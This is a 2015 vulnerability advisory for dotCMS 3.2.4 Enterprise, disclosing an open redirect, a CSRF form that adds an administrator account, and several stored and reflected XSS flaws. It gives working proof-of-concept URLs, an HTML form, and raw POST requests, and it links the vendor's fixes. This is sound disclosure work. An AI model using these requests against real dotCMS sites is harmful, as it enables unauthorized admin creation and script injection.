dotCMS 3.2.4 CSRF / XSS / Open Redirect

2015-12-08T00:00:00
ID PACKETSTORM:134714
Type packetstorm
Reporter LiquidWorm
Modified 2015-12-08T00:00:00

Description

                                        
                                            `  
dotCMS 3.2.4 Multiple Vulnerabilities  
  
  
Vendor: dotCMS Software, LLC  
Product web page: http://www.dotcms.com  
Affected version: 3.2.4 (Enterprise)  
  
Summary: DotCMS is the next generation of Content Management System (CMS).  
Quick to deploy, open source, Java-based, open APIs, extensible and massively  
scalable, dotCMS can rapidly deliver personalized, engaging multi-channel  
sites, web apps, campaigns, one-pagers, intranets - all types of content  
driven experiences - without calling in your developers.  
  
Desc: The application suffers from multiple security vulnerabilities including:  
Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request  
Forgery (CSRF).  
  
Tested on: Apache-Coyote/1.1  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5290  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php  
  
Vendor: http://dotcms.com/docs/latest/change-log  
https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305  
https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3  
  
  
19.11.2015  
  
--  
  
  
1. Open Redirect via '_EXT_LANG_redirect' GET parameter:  
--------------------------------------------------------  
  
http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia  
  
  
  
2. CSRF Add Admin:  
------------------  
  
<html>  
<body>  
<form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain">  
<input type="hidden" name="callCount" value="1  
windowName=c0-param2  
c0-scriptName=UserAjax  
c0-methodName=addUser  
c0-id=0  
c0-param0=null:null  
c0-param1=string:TEST2  
c0-param2=string:AAAA2  
c0-param3=string:AAA2%40bb.net  
c0-param4=string:123123  
batchId=3  
instanceId=0  
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1448026121316  
scriptSessionId=hd2XkJoJcyP9lEk5N8qUe*ouv5l/mn17B5l-IA*1ZViJ6  
" />  
<input type="submit" value="Tutaj" />  
</form>  
</body>  
</html>  
  
  
  
3. Multiple Stored And Reflected XSS:  
-------------------------------------  
  
POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1  
Host: 127.0.0.1  
  
callCount=1  
windowName=c0-param0  
c0-scriptName=TagAjax  
c0-methodName=addTag  
c0-id=0  
c0-param0=<script>alert(1)<%2fscript>  
c0-param1=string:  
c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20  
batchId=2  
instanceId=0  
......  
  
  
  
POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1  
Host: 127.0.0.1  
  
callCount=1  
windowName=c0-param5  
c0-scriptName=CategoryAjax  
c0-methodName=saveOrUpdateCategory  
c0-id=0  
c0-param0=boolean:true  
c0-param1=null:null  
c0-param2=<script>alert(2)<%2fscript>  
c0-param3=string:ppp  
c0-param4=string:aaa  
c0-param5=string:bbb  
batchId=2  
instanceId=0  
......  
  
  
  
POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1  
Host: 127.0.0.1  
  
query=aaaa  
offset="><script>alert(3)<%2fscript>  
limit=20  
sort=1  
userid=admin  
reindexResults=true  
......  
  
  
  
http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter]  
http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename]  
http://127.0.0.1/c/portal/layout [limit parameter]  
http://127.0.0.1/c/portal/layout [offset parameter]  
http://127.0.0.1/c/portal/layout [query parameter]  
http://127.0.0.1/c/portal/layout [sort parameter]  
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter]  
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]  
`